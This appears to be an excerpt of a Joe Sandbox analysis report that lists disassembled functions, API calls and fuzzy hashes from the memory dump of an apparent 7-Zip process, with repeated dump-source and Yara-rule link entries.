                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                • Instruction ID: 4e440d92dc58d25ea24f94b01b2fa03a789cb7cbaf1fa473804eb6b2914accac
                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E517D72704A8097CA30DF26E88029DB360F7C9BD4F408226EB9E47B59DF38D5A5CB54
                                                                                                                                                                                                Function 00969BCC Relevance: 5.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                • Instruction ID: 9c351a541fbe88ba2c99b5a45ba47d80698fd2f771ba4afb466fd4aa4afdf7dc
                                                                                                                                                                                                • Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D31936371568486CB20DF15E49052E67A9F7C97A4B988235FF9E47758DB38C882C700
                                                                                                                                                                                                Function 0096A9FC Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                • Instruction ID: 6f916d34d44ad8dcfa13d6d81bb914fb7ad3534dedbe107fc08aeb52e892d70c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C92121858052DA10EBA5E5417AAE760EFD53F0F401322BBAE93AF9DF18C94BCB00
                                                                                                                                                                                                Function 0096CF80 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3934437811-0
                                                                                                                                                                                                • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                • Instruction ID: 925ac161381fa073862a8ed3a2a737ba90983278ac585f5b243b832981ce6796
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 091181637056C09BCA349F35E85039AA750FB867A4F584315AFA9077A9DF68C54AC700
                                                                                                                                                                                                Function 009601A8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                • Instruction ID: aa43746ec7b9b2fd252d947cf425118d366b0d82a8337d98e3f9ceeed01ded17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44019B6221858481CD20EF22F555B6F9721FFC67E4F4452217EBE576BACF28C58AC704
                                                                                                                                                                                                Function 00948CDC Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 009489D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009489EA
                                                                                                                                                                                                • CreateFileW.KERNELBASE ref: 00948D51
                                                                                                                                                                                                • CreateFileW.KERNEL32 ref: 00948DA4
                                                                                                                                                                                                • free.MSVCRT ref: 00948DB2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 210839660-0
                                                                                                                                                                                                • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                • Instruction ID: 82cda94b67cb1df2956c0bc16d4e596ee655b5d40b07360f6f8ddceadb396b0a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C217C336056819AC7609F15A851B5E6B68F39A7F4F544321EFB947BE4CF38C8968B00
                                                                                                                                                                                                Function 00982CFC Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00943274: memmove.MSVCRT ref: 009432AC
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982D41
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982DCF
                                                                                                                                                                                                • free.MSVCRT ref: 00982DFF
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1158454270-0
                                                                                                                                                                                                • Opcode ID: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                • Instruction ID: 12cf31ffb942910dab270d9f41b465e9149bb1a43f8bc6ad5d95b698bf37bba1
                                                                                                                                                                                                • Opcode Fuzzy Hash: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5213162604A0181CE24AF25E85175E6774FBD5BE8F84A221FA5B477A9DE2CC5458700
                                                                                                                                                                                                Function 0094CE1C Relevance: 3.9, APIs: 3, Instructions: 178COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3796167841-0
                                                                                                                                                                                                • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                • Instruction ID: 719ab482576d4dc865e8b5cad9da77c17d394dd9f2f678b1bce145195995bae0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51F267312B14ABDF65CE3AD654FA923A4FB49784F140526EF0A87B50DB39D8A6C300
                                                                                                                                                                                                Function 00942300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputc
                                                                                                                                                                                                • String ID: Kernel
                                                                                                                                                                                                • API String ID: 1992160199-1736990243
                                                                                                                                                                                                • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                • Instruction ID: 372966e02096f2736c9b138d0cb6925fad1be4558b6a31eac5ceae9f90f44443
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DC09B5575070882EF1417B7E8553251211D75DFD1F186031CE1D07351DD1CD4D68711
                                                                                                                                                                                                Function 0098B1C8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                  • Part of subcall function 00942B04: _CxxThrowException.MSVCRT ref: 00942B2D
                                                                                                                                                                                                  • Part of subcall function 00942B04: free.MSVCRT ref: 00942B44
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3104931167-0
                                                                                                                                                                                                • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                • Instruction ID: ee6206176b754ed4dd197ec74f1365a9a298fe5ee42bd33b9623af0b42f34c0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F01C0737006909AE705EF6BEA8475E2724F76AB98F488422DF0807711DF74E8AAC310
                                                                                                                                                                                                Function 00948A60 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,00000003,?,00948E1D), ref: 00948A99
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000003,?,00948E1D), ref: 00948AA6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                • Instruction ID: daefebb34ee1b17efa8333c7ed11564d0c6107a55e58d9feb96b867575a7c7f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F0F662B017C083DF208B6DD858F5E2369E75AB98FBC6422CB0943B50DF6AC882C710
                                                                                                                                                                                                Function 00980994 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputcfputsfree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2822829076-0
                                                                                                                                                                                                • Opcode ID: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                • Instruction ID: 901b933c983303dd5e5332ea251d094600bb8ff7dfa05b05b4f31e0e50739e42
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F0126320494480CA20EF25E95575D5330E7C9BF8F589321EE6D477E9DF28C58AC710
                                                                                                                                                                                                Function 00974035 Relevance: 2.6, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memmove.MSVCRT ref: 0097404D
                                                                                                                                                                                                • memmove.MSVCRT ref: 00974087
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                                                • Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                • Instruction ID: f48fe856e328a4c1be6a809e15113077559a77356c3eacb2785074e039ebf52f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE317E672196C1A6CA31EF64E5947EEB760F3D1344F808422D79D43B6AEF38D659CB00
                                                                                                                                                                                                Function 00974054 Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memmove.MSVCRT ref: 00974065
                                                                                                                                                                                                • memmove.MSVCRT ref: 00974087
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                                                • Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                • Instruction ID: 682913f00d056a3c1b4b947c61ba68567a83d43af5c5eaab6c877def737972b4
                                                                                                                                                                                                • Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                • Instruction Fuzzy Hash: EC11C0A33096C592CE31FB50E4913AEA310E7D1390F908426DB9D47BA6DB38C689CB00
                                                                                                                                                                                                Function 00969A34 Relevance: 2.5, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                • Instruction ID: 3d44165e930348401138d3961d00269c76d8ac2098bea357387cef90a5ea7c6c
                                                                                                                                                                                                • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF08163302B9086DA24AB66E84066D6758BB86FB1F588320EF7917B91CF34C847C300
                                                                                                                                                                                                Function 00980A1C Relevance: 2.5, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00980A42
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00980A73
                                                                                                                                                                                                  • Part of subcall function 0098B480: GetTickCount.KERNEL32 ref: 0098B49E
                                                                                                                                                                                                  • Part of subcall function 0098B480: strcmp.MSVCRT ref: 0098B4E3
                                                                                                                                                                                                  • Part of subcall function 0098B480: wcscmp.MSVCRT ref: 0098B502
                                                                                                                                                                                                  • Part of subcall function 0098B480: strcmp.MSVCRT ref: 0098B568
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
